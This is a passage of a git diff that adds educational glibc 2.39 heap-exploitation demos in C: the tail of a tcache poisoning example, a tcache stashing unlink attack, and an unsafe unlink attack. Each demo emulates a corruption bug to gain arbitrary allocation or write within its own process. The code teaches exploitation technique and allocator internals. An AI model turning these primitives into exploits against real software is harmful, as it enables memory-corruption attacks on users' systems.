overwrite the first %lu bytes (fd/next pointer) of the data at %p\n" + "to point to the location to control (%p).\n", sizeof(intptr_t), b, target); + // VULNERABILITY + // the following operation assumes the address of b is known, which requires a heap leak + b[0] = (intptr_t)((long)target ^ (long)b >> 12); + // VULNERABILITY + printf("Now the tcache list has [ %p -> %p ].\n", b, target); + + printf("1st malloc(128): %p\n", malloc(128)); + printf("Now the tcache list has [ %p ].\n", target); + + intptr_t *c = malloc(128); + printf("2nd malloc(128): %p\n", c); + printf("We got the control\n"); + + assert((long)target == (long)c); + return 0; +} diff --git a/glibc_2.39/tcache_stashing_unlink_attack.c b/glibc_2.39/tcache_stashing_unlink_attack.c new file mode 100644 index 0000000..bbec3ab --- /dev/null +++ b/glibc_2.39/tcache_stashing_unlink_attack.c @@ -0,0 +1,80 @@ +#include +#include +#include + +int main(){ + unsigned long stack_var[0x10] = {0}; + unsigned long *chunk_lis[0x10] = {0}; + unsigned long *target; + + setbuf(stdout, NULL); + + printf("This file demonstrates the stashing unlink attack on tcache.\n\n"); + printf("This poc has been tested on both glibc-2.27, glibc-2.29 and glibc-2.31.\n\n"); + printf("This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n"); + printf("The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n"); + printf("This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n"); + + // stack_var emulate the fake_chunk we want to alloc to + printf("Stack_var emulates the fake chunk we want to alloc to.\n\n"); + printf("First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n"); + + stack_var[3] = (unsigned long)(&stack_var[2]); + + printf("You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]); + printf("Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]); + printf("Now we alloc 9 chunks with malloc.\n\n"); + + //now we malloc 9 chunks + for(int i = 0;i < 9;i++){ + chunk_lis[i] = (unsigned long*)malloc(0x90); + } + + //put 7 chunks into tcache + printf("Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n"); + + for(int i = 3;i < 9;i++){ + free(chunk_lis[i]); + } + + printf("As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n"); + + //last tcache bin + free(chunk_lis[1]); + //now they are put into unsorted bin + free(chunk_lis[0]); + free(chunk_lis[2]); + + //convert into small bin + printf("Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n"); + + malloc(0xa0);// size > 0x90 + + //now 5 tcache bins + printf("Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n"); + + malloc(0x90); + malloc(0x90); + + printf("Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var); + + //change victim->bck + /*VULNERABILITY*/ + chunk_lis[2][1] = (unsigned long)stack_var; + /*VULNERABILITY*/ + + //trigger the attack + printf("Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n"); + + calloc(1,0x90); + + printf("Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]); + + //malloc and return our fake chunk on stack + target = malloc(0x90); + + printf("As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target); + + assert(target == &stack_var[2]); + return 0; +} diff --git a/glibc_2.39/unsafe_unlink.c b/glibc_2.39/unsafe_unlink.c new file mode 100644 index 0000000..bdcb739 --- /dev/null +++ b/glibc_2.39/unsafe_unlink.c @@ -0,0 +1,64 @@ +#include +#include +#include +#include +#include + +uint64_t *chunk0_ptr; + +int main() +{ + setbuf(stdout, NULL); + printf("Welcome to unsafe unlink 2.0!\n"); + printf("Tested in Ubuntu 20.04 64bit.\n"); + printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n"); + printf("The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n"); + + int malloc_size = 0x420; //we want to be big enough not to use tcache or fastbin + int header_size = 2; + + printf("The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n"); + + chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0 + uint64_t *chunk1_ptr = (uint64_t*) malloc(malloc_size); //chunk1 + printf("The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr); + printf("The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr); + + printf("We create a fake chunk inside chunk0.\n"); + printf("We setup the size of our fake chunk so that we can bypass the check introduced in https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d6db68e66dff25d12c3bc5641b60cbd7fb6ab44f\n"); + chunk0_ptr[1] = chunk0_ptr[-1] - 0x10; + printf("We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\n"); + chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3); + printf("We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\n"); + printf("With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\n"); + chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2); + printf("Fake chunk fd: %p\n",(void*) chunk0_ptr[2]); + printf("Fake chunk bk: %p\n\n",(void*) chunk0_ptr[3]); + + printf("We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n"); + uint64_t *chunk1_hdr = chunk1_ptr - header_size; + printf("We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n"); + printf("It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n"); + chunk1_hdr[0] = malloc_size; + printf("If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x430, however this is its new value: %p\n",(void*)chunk1_hdr[0]); + printf("We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\n\n"); + chunk1_hdr[1] &= ~1; + + printf("Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n"); + printf("You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n"); + free(chunk1_ptr); + + printf("At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n"); + char victim_string[8]; + strcpy(victim_string,"Hello!~"); + chunk0_ptr[3] = (uint64_t) victim_string; + + printf("chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n"); + printf("Original value: %s\n",victim_string); + chunk0_ptr[0] = 0x4141414142424242LL; + printf("New Value: %s\n",victim_string); + + // sanity check + assert(*(long *)victim_string == 0x4141414142424242L); +} +